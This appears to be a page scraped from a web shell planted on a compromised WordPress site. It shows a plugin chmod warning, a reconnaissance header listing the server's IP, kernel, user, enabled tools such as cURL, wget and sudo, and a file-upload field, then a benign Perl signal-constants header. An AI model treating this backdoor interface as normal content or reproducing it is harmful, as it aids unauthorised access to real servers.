Warning: chmod(): Operation not permitted in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [0] in function chmod in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [1] in function include_once in /var/www/hopeinstoughton_www/wp-settings.php on line 560 [2] in function require_once in /var/www/hopeinstoughton_www/wp-config.php on line 85 [3] in function require_once in /var/www/hopeinstoughton_www/wp-load.php on line 50 [4] in function require_once in /var/www/hopeinstoughton_www/wp-blog-header.php on line 13 [5] in function require in /var/www/hopeinstoughton_www/index.php on line 17
| Server IP : 94.177.8.99 / Your IP : 216.73.217.165 Web Server : Apache/2.4.58 (Ubuntu) System : Linux aries 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64 User : www-data ( 33) PHP Version : 8.1.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /lib/x86_64-linux-gnu/perl/5.38/bits/ |
Upload File : |
require '_h2ph_pre.ph';
no warnings qw(redefine misc);
unless(defined(&_BITS_SIGNUM_GENERIC_H)) {
eval 'sub _BITS_SIGNUM_GENERIC_H () {1;}' unless defined(&_BITS_SIGNUM_GENERIC_H);
unless(defined(&_SIGNAL_H)) {
die("Never include <bits/signum-generic.h> directly; use <signal.h> instead.");
}
eval 'sub SIG_ERR () {(( &__sighandler_t) -1);}' unless defined(&SIG_ERR);
eval 'sub SIG_DFL () {(( &__sighandler_t) 0);}' unless defined(&SIG_DFL);
eval 'sub SIG_IGN () {(( &__sighandler_t) 1);}' unless defined(&SIG_IGN);
if(defined(&__USE_XOPEN)) {
eval 'sub SIG_HOLD () {(( &__sighandler_t) 2);}' unless defined(&SIG_HOLD);
}
eval 'sub SIGINT () {2;}' unless defined(&SIGINT);
eval 'sub SIGILL () {4;}' unless defined(&SIGILL);
eval 'sub SIGABRT () {6;}' unless defined(&SIGABRT);
eval 'sub SIGFPE () {8;}' unless defined(&SIGFPE);
eval 'sub SIGSEGV () {11;}' unless defined(&SIGSEGV);
eval 'sub SIGTERM () {15;}' unless defined(&SIGTERM);
eval 'sub SIGHUP () {1;}' unless defined(&SIGHUP);
eval 'sub SIGQUIT () {3;}' unless defined(&SIGQUIT);
eval 'sub SIGTRAP () {5;}' unless defined(&SIGTRAP);
eval 'sub SIGKILL () {9;}' unless defined(&SIGKILL);
eval 'sub SIGPIPE () {13;}' unless defined(&SIGPIPE);
eval 'sub SIGALRM () {14;}' unless defined(&SIGALRM);
eval 'sub SIGIO () { &SIGPOLL;}' unless defined(&SIGIO);
eval 'sub SIGIOT () { &SIGABRT;}' unless defined(&SIGIOT);
eval 'sub SIGCLD () { &SIGCHLD;}' unless defined(&SIGCLD);
require 'bits/signum-arch.ph';
eval 'sub _NSIG () {( &__SIGRTMAX + 1);}' unless defined(&_NSIG);
}
1;